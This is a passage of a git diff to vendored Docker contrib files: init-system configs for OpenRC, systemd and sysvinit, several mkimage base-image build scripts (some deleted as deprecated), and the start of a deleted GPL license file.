-EXPOSE 80/tcp -COPY httpserver . 
-CMD ["./httpserver"] diff --git a/vendor/github.com/docker/docker/contrib/init/openrc/docker.confd b/vendor/github.com/docker/docker/contrib/init/openrc/docker.confd index 244403113e..89183de46b 100644 --- a/vendor/github.com/docker/docker/contrib/init/openrc/docker.confd +++ b/vendor/github.com/docker/docker/contrib/init/openrc/docker.confd @@ -1,8 +1,18 @@ # /etc/conf.d/docker: config file for /etc/init.d/docker # where the docker daemon output gets piped +# this contains both stdout and stderr. If you need to separate them, +# see the settings below #DOCKER_LOGFILE="/var/log/docker.log" +# where the docker daemon stdout gets piped +# if this is not set, DOCKER_LOGFILE is used +#DOCKER_OUTFILE="/var/log/docker-out.log" + +# where the docker daemon stderr gets piped +# if this is not set, DOCKER_LOGFILE is used +#DOCKER_ERRFILE="/var/log/docker-err.log" + # where docker's pid get stored #DOCKER_PIDFILE="/run/docker.pid" diff --git a/vendor/github.com/docker/docker/contrib/init/openrc/docker.initd b/vendor/github.com/docker/docker/contrib/init/openrc/docker.initd index 5d3160338a..6c968f607e 100644 --- a/vendor/github.com/docker/docker/contrib/init/openrc/docker.initd +++ b/vendor/github.com/docker/docker/contrib/init/openrc/docker.initd @@ -6,8 +6,10 @@ command="${DOCKERD_BINARY:-/usr/bin/dockerd}" pidfile="${DOCKER_PIDFILE:-/run/${RC_SVCNAME}.pid}" command_args="-p \"${pidfile}\" ${DOCKER_OPTS}" DOCKER_LOGFILE="${DOCKER_LOGFILE:-/var/log/${RC_SVCNAME}.log}" +DOCKER_ERRFILE="${DOCKER_ERRFILE:-${DOCKER_LOGFILE}}" +DOCKER_OUTFILE="${DOCKER_OUTFILE:-${DOCKER_LOGFILE}}" start_stop_daemon_args="--background \ - --stderr \"${DOCKER_LOGFILE}\" --stdout \"${DOCKER_LOGFILE}\"" + --stderr \"${DOCKER_ERRFILE}\" --stdout \"${DOCKER_OUTFILE}\"" start_pre() { checkpath -f -m 0644 -o root:docker "$DOCKER_LOGFILE" diff --git a/vendor/github.com/docker/docker/contrib/init/systemd/docker.service b/vendor/github.com/docker/docker/contrib/init/systemd/docker.service index 
8bfed93c75..517463172b 100644 --- a/vendor/github.com/docker/docker/contrib/init/systemd/docker.service +++ b/vendor/github.com/docker/docker/contrib/init/systemd/docker.service @@ -1,7 +1,8 @@ [Unit] Description=Docker Application Container Engine Documentation=https://docs.docker.com -After=network.target docker.socket firewalld.service +After=network-online.target docker.socket firewalld.service +Wants=network-online.target Requires=docker.socket [Service] @@ -24,6 +25,10 @@ TimeoutStartSec=0 Delegate=yes # kill only the docker process, not all processes in the cgroup KillMode=process +# restart the docker process if it exits prematurely +Restart=on-failure +StartLimitBurst=3 +StartLimitInterval=60s [Install] WantedBy=multi-user.target diff --git a/vendor/github.com/docker/docker/contrib/init/systemd/docker.service.rpm b/vendor/github.com/docker/docker/contrib/init/systemd/docker.service.rpm index 6e41892399..6c60646b56 100644 --- a/vendor/github.com/docker/docker/contrib/init/systemd/docker.service.rpm +++ b/vendor/github.com/docker/docker/contrib/init/systemd/docker.service.rpm @@ -1,7 +1,8 @@ [Unit] Description=Docker Application Container Engine Documentation=https://docs.docker.com -After=network.target firewalld.service +After=network-online.target firewalld.service +Wants=network-online.target [Service] Type=notify @@ -23,6 +24,10 @@ TimeoutStartSec=0 Delegate=yes # kill only the docker process, not all processes in the cgroup KillMode=process +# restart the docker process if it exits prematurely +Restart=on-failure +StartLimitBurst=3 +StartLimitInterval=60s [Install] WantedBy=multi-user.target diff --git a/vendor/github.com/docker/docker/contrib/init/sysvinit-debian/docker b/vendor/github.com/docker/docker/contrib/init/sysvinit-debian/docker index 4f9d38dda5..9c8fa6be73 100755 --- a/vendor/github.com/docker/docker/contrib/init/sysvinit-debian/docker +++ b/vendor/github.com/docker/docker/contrib/init/sysvinit-debian/docker @@ -119,9 +119,13 @@ case "$1" 
in stop) check_init fail_unless_root - log_begin_msg "Stopping $DOCKER_DESC: $BASE" - start-stop-daemon --stop --pidfile "$DOCKER_SSD_PIDFILE" --retry 10 - log_end_msg $? + if [ -f "$DOCKER_SSD_PIDFILE" ]; then + log_begin_msg "Stopping $DOCKER_DESC: $BASE" + start-stop-daemon --stop --pidfile "$DOCKER_SSD_PIDFILE" --retry 10 + log_end_msg $? + else + log_warning_msg "Docker already stopped - file $DOCKER_SSD_PIDFILE not found." + fi ;; restart) diff --git a/vendor/github.com/docker/docker/contrib/mkimage-alpine.sh b/vendor/github.com/docker/docker/contrib/mkimage-alpine.sh index 47cd35ce62..03180e435a 100755 --- a/vendor/github.com/docker/docker/contrib/mkimage-alpine.sh +++ b/vendor/github.com/docker/docker/contrib/mkimage-alpine.sh @@ -8,7 +8,7 @@ set -e } usage() { - printf >&2 '%s: [-r release] [-m mirror] [-s] [-c additional repository]\n' "$0" + printf >&2 '%s: [-r release] [-m mirror] [-s] [-c additional repository] [-a arch]\n' "$0" exit 1 } @@ -47,12 +47,12 @@ pack() { } save() { - [ $SAVE -eq 1 ] || return + [ $SAVE -eq 1 ] || return 0 tar --numeric-owner -C $ROOTFS -c . 
| xz > rootfs.tar.xz } -while getopts "hr:m:s" opt; do +while getopts "hr:m:sc:a:" opt; do case $opt in r) REL=$OPTARG @@ -64,7 +64,10 @@ while getopts "hr:m:s" opt; do SAVE=1 ;; c) - ADDITIONALREPO=community + ADDITIONALREPO=$OPTARG + ;; + a) + ARCH=$OPTARG ;; *) usage @@ -76,7 +79,7 @@ REL=${REL:-edge} MIRROR=${MIRROR:-http://nl.alpinelinux.org/alpine} SAVE=${SAVE:-0} MAINREPO=$MIRROR/$REL/main -ADDITIONALREPO=$MIRROR/$REL/community +ADDITIONALREPO=$MIRROR/$REL/${ADDITIONALREPO:-community} ARCH=${ARCH:-$(uname -m)} tmp diff --git a/vendor/github.com/docker/docker/contrib/mkimage-busybox.sh b/vendor/github.com/docker/docker/contrib/mkimage-busybox.sh deleted file mode 100755 index b11a6bb265..0000000000 --- a/vendor/github.com/docker/docker/contrib/mkimage-busybox.sh +++ /dev/null @@ -1,43 +0,0 @@ -#!/usr/bin/env bash -# Generate a very minimal filesystem based on busybox-static, -# and load it into the local docker under the name "busybox". - -echo >&2 -echo >&2 'warning: this script is deprecated - see mkimage.sh and mkimage/busybox-static' -echo >&2 - -BUSYBOX=$(which busybox) -[ "$BUSYBOX" ] || { - echo "Sorry, I could not locate busybox." - echo "Try 'apt-get install busybox-static'?" - exit 1 -} - -set -e -ROOTFS=${TMPDIR:-/var/tmp}/rootfs-busybox-$$-$RANDOM -mkdir $ROOTFS -cd $ROOTFS - -mkdir bin etc dev dev/pts lib proc sys tmp -touch etc/resolv.conf -cp /etc/nsswitch.conf etc/nsswitch.conf -echo root:x:0:0:root:/:/bin/sh > etc/passwd -echo root:x:0: > etc/group -ln -s lib lib64 -ln -s bin sbin -cp $BUSYBOX bin -for X in $(busybox --list) -do - ln -s busybox bin/$X -done -rm bin/init -ln bin/busybox bin/init -cp /lib/x86_64-linux-gnu/lib{pthread,c,dl,nsl,nss_*}.so.* lib -cp /lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 lib -for X in console null ptmx random stdin stdout stderr tty urandom zero -do - cp -a /dev/$X dev -done - -tar --numeric-owner -cf- . | docker import - busybox -docker run -i -u root busybox /bin/echo Success. 
diff --git a/vendor/github.com/docker/docker/contrib/mkimage-debootstrap.sh b/vendor/github.com/docker/docker/contrib/mkimage-debootstrap.sh deleted file mode 100755 index 412a5ce0a7..0000000000 --- a/vendor/github.com/docker/docker/contrib/mkimage-debootstrap.sh +++ /dev/null @@ -1,297 +0,0 @@ -#!/usr/bin/env bash -set -e - -echo >&2 -echo >&2 'warning: this script is deprecated - see mkimage.sh and mkimage/debootstrap' -echo >&2 - -variant='minbase' -include='iproute,iputils-ping' -arch='amd64' # intentionally undocumented for now -skipDetection= -strictDebootstrap= -justTar= - -usage() { - echo >&2 - - echo >&2 "usage: $0 [options] repo suite [mirror]" - - echo >&2 - echo >&2 'options: (not recommended)' - echo >&2 " -p set an http_proxy for debootstrap" - echo >&2 " -v $variant # change default debootstrap variant" - echo >&2 " -i $include # change default package includes" - echo >&2 " -d # strict debootstrap (do not apply any docker-specific tweaks)" - echo >&2 " -s # skip version detection and tagging (ie, precise also tagged as 12.04)" - echo >&2 " # note that this will also skip adding universe and/or security/updates to sources.list" - echo >&2 " -t # just create a tarball, especially for dockerbrew (uses repo as tarball name)" - - echo >&2 - echo >&2 " ie: $0 username/debian squeeze" - echo >&2 " $0 username/debian squeeze http://ftp.uk.debian.org/debian/" - - echo >&2 - echo >&2 " ie: $0 username/ubuntu precise" - echo >&2 " $0 username/ubuntu precise http://mirrors.melbourne.co.uk/ubuntu/" - - echo >&2 - echo >&2 " ie: $0 -t precise.tar.bz2 precise" - echo >&2 " $0 -t wheezy.tgz wheezy" - echo >&2 " $0 -t wheezy-uk.tar.xz wheezy http://ftp.uk.debian.org/debian/" - - echo >&2 -} - -# these should match the names found at http://www.debian.org/releases/ -debianStable=wheezy -debianUnstable=sid -# this should match the name found at http://releases.ubuntu.com/ -ubuntuLatestLTS=trusty -# this should match the name found at http://releases.tanglu.org/ 
-tangluLatest=aequorea - -while getopts v:i:a:p:dst name; do - case "$name" in - p) - http_proxy="$OPTARG" - ;; - v) - variant="$OPTARG" - ;; - i) - include="$OPTARG" - ;; - a) - arch="$OPTARG" - ;; - d) - strictDebootstrap=1 - ;; - s) - skipDetection=1 - ;; - t) - justTar=1 - ;; - ?) - usage - exit 0 - ;; - esac -done -shift $(($OPTIND - 1)) - -repo="$1" -suite="$2" -mirror="${3:-}" # stick to the default debootstrap mirror if one is not provided - -if [ ! "$repo" ] || [ ! "$suite" ]; then - usage - exit 1 -fi - -# some rudimentary detection for whether we need to "sudo" our docker calls -docker='' -if docker version > /dev/null 2>&1; then - docker='docker' -elif sudo docker version > /dev/null 2>&1; then - docker='sudo docker' -elif command -v docker > /dev/null 2>&1; then - docker='docker' -else - echo >&2 "warning: either docker isn't installed, or your current user cannot run it;" - echo >&2 " this script is not likely to work as expected" - sleep 3 - docker='docker' # give us a command-not-found later -fi - -# make sure we have an absolute path to our final tarball so we can still reference it properly after we change directory -if [ "$justTar" ]; then - if [ ! 
-d "$(dirname "$repo")" ]; then - echo >&2 "error: $(dirname "$repo") does not exist" - exit 1 - fi - repo="$(cd "$(dirname "$repo")" && pwd -P)/$(basename "$repo")" -fi - -# will be filled in later, if [ -z "$skipDetection" ] -lsbDist='' - -target="${TMPDIR:-/var/tmp}/docker-rootfs-debootstrap-$suite-$$-$RANDOM" - -cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" -returnTo="$(pwd -P)" - -if [ "$suite" = 'lucid' ]; then - # lucid fails and doesn't include gpgv in minbase; "apt-get update" fails - include+=',gpgv' -fi - -set -x - -# bootstrap -mkdir -p "$target" -sudo http_proxy=$http_proxy debootstrap --verbose --variant="$variant" --include="$include" --arch="$arch" "$suite" "$target" "$mirror" - -cd "$target" - -if [ -z "$strictDebootstrap" ]; then - # prevent init scripts from running during install/update - # policy-rc.d (for most scripts) - echo $'#!/bin/sh\nexit 101' | sudo tee usr/sbin/policy-rc.d > /dev/null - sudo chmod +x usr/sbin/policy-rc.d - # initctl (for some pesky upstart scripts) - sudo chroot . dpkg-divert --local --rename --add /sbin/initctl - sudo ln -sf /bin/true sbin/initctl - # see https://github.com/docker/docker/issues/446#issuecomment-16953173 - - # shrink the image, since apt makes us fat (wheezy: ~157.5MB vs ~120MB) - sudo chroot . 
apt-get clean - - if strings usr/bin/dpkg | grep -q unsafe-io; then - # while we're at it, apt is unnecessarily slow inside containers - # this forces dpkg not to call sync() after package extraction and speeds up install - # the benefit is huge on spinning disks, and the penalty is nonexistent on SSD or decent server virtualization - echo 'force-unsafe-io' | sudo tee etc/dpkg/dpkg.cfg.d/02apt-speedup > /dev/null - # we have this wrapped up in an "if" because the "force-unsafe-io" - # option was added in dpkg 1.15.8.6 - # (see http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=584254#82), - # and ubuntu lucid/10.04 only has 1.15.5.6 - fi - - # we want to effectively run "apt-get clean" after every install to keep images small (see output of "apt-get clean -s" for context) - { - aptGetClean='"rm -f /var/cache/apt/archives/*.deb /var/cache/apt/archives/partial/*.deb /var/cache/apt/*.bin || true";' - echo "DPkg::Post-Invoke { ${aptGetClean} };" - echo "APT::Update::Post-Invoke { ${aptGetClean} };" - echo 'Dir::Cache::pkgcache ""; Dir::Cache::srcpkgcache "";' - } | sudo tee etc/apt/apt.conf.d/no-cache > /dev/null - - # and remove the translations, too - echo 'Acquire::Languages "none";' | sudo tee etc/apt/apt.conf.d/no-languages > /dev/null - - # helpful undo lines for each the above tweaks (for lack of a better home to keep track of them): - # rm /usr/sbin/policy-rc.d - # rm /sbin/initctl; dpkg-divert --rename --remove /sbin/initctl - # rm /etc/dpkg/dpkg.cfg.d/02apt-speedup - # rm /etc/apt/apt.conf.d/no-cache - # rm /etc/apt/apt.conf.d/no-languages - - if [ -z "$skipDetection" ]; then - # see also rudimentary platform detection in hack/install.sh - lsbDist='' - if [ -r etc/lsb-release ]; then - lsbDist="$(. 
etc/lsb-release && echo "$DISTRIB_ID")" - fi - if [ -z "$lsbDist" ] && [ -r etc/debian_version ]; then - lsbDist='Debian' - fi - - case "$lsbDist" in - Debian) - # add the updates and security repositories - if [ "$suite" != "$debianUnstable" -a "$suite" != 'unstable' ]; then - # ${suite}-updates only applies to non-unstable - sudo sed -i "p; s/ $suite main$/ ${suite}-updates main/" etc/apt/sources.list - - # same for security updates - echo "deb http://security.debian.org/ $suite/updates main" | sudo tee -a etc/apt/sources.list > /dev/null - fi - ;; - Ubuntu) - # add the universe, updates, and security repositories - sudo sed -i " - s/ $suite main$/ $suite main universe/; p; - s/ $suite main/ ${suite}-updates main/; p; - s/ $suite-updates main/ ${suite}-security main/ - " etc/apt/sources.list - ;; - Tanglu) - # add the updates repository - if [ "$suite" = "$tangluLatest" ]; then - # ${suite}-updates only applies to stable Tanglu versions - sudo sed -i "p; s/ $suite main$/ ${suite}-updates main/" etc/apt/sources.list - fi - ;; - SteamOS) - # add contrib and non-free - sudo sed -i "s/ $suite main$/ $suite main contrib non-free/" etc/apt/sources.list - ;; - esac - fi - - # make sure our packages lists are as up to date as we can get them - sudo chroot . apt-get update - sudo chroot . apt-get dist-upgrade -y -fi - -if [ "$justTar" ]; then - # create the tarball file so it has the right permissions (ie, not root) - touch "$repo" - - # fill the tarball - sudo tar --numeric-owner -caf "$repo" . -else - # create the image (and tag $repo:$suite) - sudo tar --numeric-owner -c . 
| $docker import - $repo:$suite - - # test the image - $docker run -i -t $repo:$suite echo success - - if [ -z "$skipDetection" ]; then - case "$lsbDist" in - Debian) - if [ "$suite" = "$debianStable" -o "$suite" = 'stable' ] && [ -r etc/debian_version ]; then - # tag latest - $docker tag $repo:$suite $repo:latest - - if [ -r etc/debian_version ]; then - # tag the specific debian release version (which is only reasonable to tag on debian stable) - ver=$(cat etc/debian_version) - $docker tag $repo:$suite $repo:$ver - fi - fi - ;; - Ubuntu) - if [ "$suite" = "$ubuntuLatestLTS" ]; then - # tag latest - $docker tag $repo:$suite $repo:latest - fi - if [ -r etc/lsb-release ]; then - lsbRelease="$(. etc/lsb-release && echo "$DISTRIB_RELEASE")" - if [ "$lsbRelease" ]; then - # tag specific Ubuntu version number, if available (12.04, etc.) - $docker tag $repo:$suite $repo:$lsbRelease - fi - fi - ;; - Tanglu) - if [ "$suite" = "$tangluLatest" ]; then - # tag latest - $docker tag $repo:$suite $repo:latest - fi - if [ -r etc/lsb-release ]; then - lsbRelease="$(. etc/lsb-release && echo "$DISTRIB_RELEASE")" - if [ "$lsbRelease" ]; then - # tag specific Tanglu version number, if available (1.0, 2.0, etc.) - $docker tag $repo:$suite $repo:$lsbRelease - fi - fi - ;; - SteamOS) - if [ -r etc/lsb-release ]; then - lsbRelease="$(. etc/lsb-release && echo "$DISTRIB_RELEASE")" - if [ "$lsbRelease" ]; then - # tag specific SteamOS version number, if available (1.0, 2.0, etc.) - $docker tag $repo:$suite $repo:$lsbRelease - fi - fi - ;; - esac - fi -fi - -# cleanup -cd "$returnTo" -sudo rm -rf "$target" diff --git a/vendor/github.com/docker/docker/contrib/mkimage-rinse.sh b/vendor/github.com/docker/docker/contrib/mkimage-rinse.sh deleted file mode 100755 index 7e0935062f..0000000000 --- a/vendor/github.com/docker/docker/contrib/mkimage-rinse.sh +++ /dev/null @@ -1,123 +0,0 @@ -#!/usr/bin/env bash -# -# Create a base CentOS Docker image. 
- -# This script is useful on systems with rinse available (e.g., -# building a CentOS image on Debian). See contrib/mkimage-yum.sh for -# a way to build CentOS images on systems with yum installed. - -set -e - -echo >&2 -echo >&2 'warning: this script is deprecated - see mkimage.sh and mkimage/rinse' -echo >&2 - -repo="$1" -distro="$2" -mirror="$3" - -if [ ! "$repo" ] || [ ! "$distro" ]; then - self="$(basename $0)" - echo >&2 "usage: $self repo distro [mirror]" - echo >&2 - echo >&2 " ie: $self username/centos centos-5" - echo >&2 " $self username/centos centos-6" - echo >&2 - echo >&2 " ie: $self username/slc slc-5" - echo >&2 " $self username/slc slc-6" - echo >&2 - echo >&2 " ie: $self username/centos centos-5 http://vault.centos.org/5.8/os/x86_64/CentOS/" - echo >&2 " $self username/centos centos-6 http://vault.centos.org/6.3/os/x86_64/Packages/" - echo >&2 - echo >&2 'See /etc/rinse for supported values of "distro" and for examples of' - echo >&2 ' expected values of "mirror".' - echo >&2 - echo >&2 'This script is tested to work with the original upstream version of rinse,' - echo >&2 ' found at http://www.steve.org.uk/Software/rinse/ and also in Debian at' - echo >&2 ' http://packages.debian.org/wheezy/rinse -- as always, YMMV.' 
- echo >&2 - exit 1 -fi - -target="${TMPDIR:-/var/tmp}/docker-rootfs-rinse-$distro-$$-$RANDOM" - -cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" -returnTo="$(pwd -P)" - -rinseArgs=( --arch amd64 --distribution "$distro" --directory "$target" ) -if [ "$mirror" ]; then - rinseArgs+=( --mirror "$mirror" ) -fi - -set -x - -mkdir -p "$target" - -sudo rinse "${rinseArgs[@]}" - -cd "$target" - -# rinse fails a little at setting up /dev, so we'll just wipe it out and create our own -sudo rm -rf dev -sudo mkdir -m 755 dev -( - cd dev - sudo ln -sf /proc/self/fd ./ - sudo mkdir -m 755 pts - sudo mkdir -m 1777 shm - sudo mknod -m 600 console c 5 1 - sudo mknod -m 600 initctl p - sudo mknod -m 666 full c 1 7 - sudo mknod -m 666 null c 1 3 - sudo mknod -m 666 ptmx c 5 2 - sudo mknod -m 666 random c 1 8 - sudo mknod -m 666 tty c 5 0 - sudo mknod -m 666 tty0 c 4 0 - sudo mknod -m 666 urandom c 1 9 - sudo mknod -m 666 zero c 1 5 -) - -# effectively: febootstrap-minimize --keep-zoneinfo --keep-rpmdb --keep-services "$target" -# locales -sudo rm -rf usr/{{lib,share}/locale,{lib,lib64}/gconv,bin/localedef,sbin/build-locale-archive} -# docs and man pages -sudo rm -rf usr/share/{man,doc,info,gnome/help} -# cracklib -sudo rm -rf usr/share/cracklib -# i18n -sudo rm -rf usr/share/i18n -# yum cache -sudo rm -rf var/cache/yum -sudo mkdir -p --mode=0755 var/cache/yum -# sln -sudo rm -rf sbin/sln -# ldconfig -#sudo rm -rf sbin/ldconfig -sudo rm -rf etc/ld.so.cache var/cache/ldconfig -sudo mkdir -p --mode=0755 var/cache/ldconfig - -# allow networking init scripts inside the container to work without extra steps -echo 'NETWORKING=yes' | sudo tee etc/sysconfig/network > /dev/null - -# to restore locales later: -# yum reinstall glibc-common - -version= -if [ -r etc/redhat-release ]; then - version="$(sed -E 's/^[^0-9.]*([0-9.]+).*$/\1/' etc/redhat-release)" -elif [ -r etc/SuSE-release ]; then - version="$(awk '/^VERSION/ { print $3 }' etc/SuSE-release)" -fi - -if [ -z "$version" ]; then - echo 
>&2 "warning: cannot autodetect OS version, using $distro as tag" - sleep 20 - version="$distro" -fi - -sudo tar --numeric-owner -c . | docker import - $repo:$version - -docker run -i -t $repo:$version echo success - -cd "$returnTo" -sudo rm -rf "$target" diff --git a/vendor/github.com/docker/docker/contrib/mkimage-yum.sh b/vendor/github.com/docker/docker/contrib/mkimage-yum.sh index 29da170480..901280451b 100755 --- a/vendor/github.com/docker/docker/contrib/mkimage-yum.sh +++ b/vendor/github.com/docker/docker/contrib/mkimage-yum.sh @@ -81,13 +81,13 @@ fi if [[ -n "$install_groups" ]]; then yum -c "$yum_config" --installroot="$target" --releasever=/ --setopt=tsflags=nodocs \ - --setopt=group_package_types=mandatory -y groupinstall $install_groups + --setopt=group_package_types=mandatory -y groupinstall "$install_groups" fi if [[ -n "$install_packages" ]]; then yum -c "$yum_config" --installroot="$target" --releasever=/ --setopt=tsflags=nodocs \ - --setopt=group_package_types=mandatory -y install $install_packages + --setopt=group_package_types=mandatory -y install "$install_packages" fi yum -c "$yum_config" --installroot="$target" -y clean all diff --git a/vendor/github.com/docker/docker/contrib/mkimage.sh b/vendor/github.com/docker/docker/contrib/mkimage.sh index 13298c8036..ae05d139c3 100755 --- a/vendor/github.com/docker/docker/contrib/mkimage.sh +++ b/vendor/github.com/docker/docker/contrib/mkimage.sh @@ -11,7 +11,6 @@ usage() { echo >&2 " $mkimg -t someuser/centos:5 rinse --distribution centos-5" echo >&2 " $mkimg -t someuser/mageia:4 mageia-urpmi --version=4" echo >&2 " $mkimg -t someuser/mageia:4 mageia-urpmi --version=4 --mirror=http://somemirror/" - echo >&2 " $mkimg -t someuser/solaris solaris" exit 1 } @@ -20,13 +19,6 @@ scriptDir="$(dirname "$(readlink -f "$BASH_SOURCE")")/mkimage" os= os=$(uname -o) -# set up path to gnu tools if solaris -[[ $os == "Solaris" ]] && export PATH=/usr/gnu/bin:$PATH -# TODO check for gnu-tar, gnu-getopt - -# TODO requires 
root/sudo due to some pkg operations. sigh. -[[ $os == "Solaris" && $EUID != "0" ]] && echo >&2 "image create on Solaris requires superuser privilege" - optTemp=$(getopt --options '+d:t:c:hC' --longoptions 'dir:,tag:,compression:,no-compression,help' --name "$mkimg" -- "$@") eval set -- "$optTemp" unset optTemp diff --git a/vendor/github.com/docker/docker/contrib/mkimage/debootstrap b/vendor/github.com/docker/docker/contrib/mkimage/debootstrap index 7d56d8ea9f..9f7d8987ad 100755 --- a/vendor/github.com/docker/docker/contrib/mkimage/debootstrap +++ b/vendor/github.com/docker/docker/contrib/mkimage/debootstrap @@ -1,7 +1,21 @@ #!/usr/bin/env bash set -e +mkimgdeb="$(basename "$0")" +mkimg="$(dirname "$0").sh" + +usage() { + echo >&2 "usage: $mkimgdeb rootfsDir suite [debootstrap-args]" + echo >&2 " note: $mkimgdeb meant to be used from $mkimg" + exit 1 +} + rootfsDir="$1" +if [ -z "$rootfsDir" ]; then + echo >&2 "error: rootfsDir is missing" + echo >&2 + usage +fi shift # we have to do a little fancy footwork to make sure "rootfsDir" becomes the second non-option argument to debootstrap @@ -13,10 +27,21 @@ while [ $# -gt 0 ] && [[ "$1" == -* ]]; do done suite="$1" +if [ -z "$suite" ]; then + echo >&2 "error: suite is missing" + echo >&2 + usage +fi shift # get path to "chroot" in our current PATH -chrootPath="$(type -P chroot)" +chrootPath="$(type -P chroot || :)" +if [ -z "$chrootPath" ]; then + echo >&2 "error: chroot not found. Are you root?" + echo >&2 + usage +fi + rootfs_chroot() { # "chroot" doesn't set PATH, so we need to set it explicitly to something our new debootstrap chroot can use appropriately! @@ -168,7 +193,7 @@ if [ -z "$DONT_TOUCH_SOURCES_LIST" ]; then case "$lsbDist" in debian) # updates and security! 
- if [ "$suite" != 'sid' -a "$suite" != 'unstable' ]; then + if curl -o /dev/null -s --head --fail "http://security.debian.org/dists/$suite/updates/main/binary-$(rootfs_chroot dpkg --print-architecture)/Packages.gz"; then ( set -x sed -i " diff --git a/vendor/github.com/docker/docker/contrib/mkimage/solaris b/vendor/github.com/docker/docker/contrib/mkimage/solaris deleted file mode 100755 index 158970e69e..0000000000 --- a/vendor/github.com/docker/docker/contrib/mkimage/solaris +++ /dev/null @@ -1,89 +0,0 @@ -#!/usr/bin/env bash -# -# Solaris 12 base image build script. -# -set -e - -# TODO add optional package publisher origin - -rootfsDir="$1" -shift - -# base install -( - set -x - - pkg image-create --full --zone \ - --facet facet.locale.*=false \ - --facet facet.locale.POSIX=true \ - --facet facet.doc=false \ - --facet facet.doc.*=false \ - "$rootfsDir" - - pkg -R "$rootfsDir" set-property use-system-repo true - - pkg -R "$rootfsDir" set-property flush-content-cache-on-success true - - pkg -R "$rootfsDir" install core-os -) - -# Lay in stock configuration, set up milestone -# XXX This all may become optional in a base image -( - # faster to build repository database on tmpfs - REPO_DB=/system/volatile/repository.$$ - export SVCCFG_REPOSITORY=${REPO_DB} - export SVCCFG_DOOR_PATH=$rootfsDir/system/volatile/tmp_repo_door - - # Import base manifests. NOTE These are a combination of basic requirement - # and gleaned from container milestone manifest. They may change. 
- for m in $rootfsDir/lib/svc/manifest/system/environment.xml \ - $rootfsDir/lib/svc/manifest/system/svc/global.xml \ - $rootfsDir/lib/svc/manifest/system/svc/restarter.xml \ - $rootfsDir/lib/svc/manifest/network/dns/client.xml \ - $rootfsDir/lib/svc/manifest/system/name-service/switch.xml \ - $rootfsDir/lib/svc/manifest/system/name-service/cache.xml \ - $rootfsDir/lib/svc/manifest/milestone/container.xml ; do - svccfg import $m - done - - # Apply system layer profile, deleting unnecessary dependencies - svccfg apply $rootfsDir/etc/svc/profile/generic_container.xml - - # XXX Even if we keep a repo in the base image, this is definitely optional - svccfg apply $rootfsDir/etc/svc/profile/sysconfig/container_sc.xml - - for s in svc:/system/svc/restarter \ - svc:/system/environment \ - svc:/network/dns/client \ - svc:/system/name-service/switch \ - svc:/system/name-service/cache \ - svc:/system/svc/global \ - svc:/milestone/container ;do - svccfg -s $s refresh - done - - # now copy the built up repository into the base rootfs - mv $REPO_DB $rootfsDir/etc/svc/repository.db -) - -# pkg(1) needs the zoneproxy-client running in the container. -# use a simple wrapper to run it as needed. -# XXX maybe we go back to running this in SMF? -mv "$rootfsDir/usr/bin/pkg" "$rootfsDir/usr/bin/wrapped_pkg" -cat > "$rootfsDir/usr/bin/pkg" <<-'EOF' -#!/bin/sh -# -# THIS FILE CREATED DURING DOCKER BASE IMAGE CREATION -# -# The Solaris base image uses the sysrepo proxy mechanism. The -# IPS client pkg(1) requires the zoneproxy-client to reach the -# remote publisher origins through the host. This wrapper script -# enables and disables the proxy client as needed. This is a -# temporary solution. 
- -/usr/lib/zones/zoneproxy-client -s localhost:1008 -PKG_SYSREPO_URL=http://localhost:1008 /usr/bin/wrapped_pkg "$@" -pkill -9 zoneproxy-client -EOF -chmod +x "$rootfsDir/usr/bin/pkg" diff --git a/vendor/github.com/docker/docker/contrib/nuke-graph-directory.sh b/vendor/github.com/docker/docker/contrib/nuke-graph-directory.sh index 5eeb45c8bd..3d2f49e869 100755 --- a/vendor/github.com/docker/docker/contrib/nuke-graph-directory.sh +++ b/vendor/github.com/docker/docker/contrib/nuke-graph-directory.sh @@ -1,4 +1,4 @@ -#!/bin/sh +#!/usr/bin/env bash set -e dir="$1" diff --git a/vendor/github.com/docker/docker/contrib/project-stats.sh b/vendor/github.com/docker/docker/contrib/project-stats.sh deleted file mode 100755 index 2691c72ffb..0000000000 --- a/vendor/github.com/docker/docker/contrib/project-stats.sh +++ /dev/null @@ -1,22 +0,0 @@ -#!/usr/bin/env bash - -## Run this script from the root of the docker repository -## to query project stats useful to the maintainers. -## You will need to install `pulls` and `issues` from -## https://github.com/crosbymichael/pulls - -set -e - -echo -n "Open pulls: " -PULLS=$(pulls | wc -l); let PULLS=$PULLS-1 -echo $PULLS - -echo -n "Pulls alru: " -pulls alru - -echo -n "Open issues: " -ISSUES=$(issues list | wc -l); let ISSUES=$ISSUES-1 -echo $ISSUES - -echo -n "Issues alru: " -issues alru diff --git a/vendor/github.com/docker/docker/contrib/reprepro/suites.sh b/vendor/github.com/docker/docker/contrib/reprepro/suites.sh deleted file mode 100755 index 9ecf99d465..0000000000 --- a/vendor/github.com/docker/docker/contrib/reprepro/suites.sh +++ /dev/null @@ -1,12 +0,0 @@ -#!/bin/bash -set -e - -cd "$(dirname "$BASH_SOURCE")/../.." 
- -targets_from() { - git fetch -q https://github.com/docker/docker.git "$1" - git ls-tree -r --name-only "$(git rev-parse FETCH_HEAD)" contrib/builder/deb/ | grep '/Dockerfile$' | sed -r 's!^contrib/builder/deb/|^contrib/builder/deb/amd64/|-debootstrap|/Dockerfile$!!g' | grep -v / -} - -release_branch=$(git ls-remote --heads https://github.com/docker/docker.git | awk -F 'refs/heads/' '$2 ~ /^release/ { print $2 }' | sort -V | tail -1) -{ targets_from master; targets_from "$release_branch"; } | sort -u diff --git a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/LICENSE b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/LICENSE deleted file mode 100644 index d511905c16..0000000000 --- a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/LICENSE +++ /dev/null @@ -1,339 +0,0 @@ - GNU GENERAL PUBLIC LICENSE - Version 2, June 1991 - - Copyright (C) 1989, 1991 Free Software Foundation, Inc., - 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA - Everyone is permitted to copy and distribute verbatim copies - of this license document, but changing it is not allowed. - - Preamble - - The licenses for most software are designed to take away your -freedom to share and change it. By contrast, the GNU General Public -License is intended to guarantee your freedom to share and change free -software--to make sure the software is free for all its users. This -General Public License applies to most of the Free Software -Foundation's software and to any other program whose authors commit to -using it. (Some other Free Software Foundation software is covered by -the GNU Lesser General Public License instead.) You can apply it to -your programs, too. - - 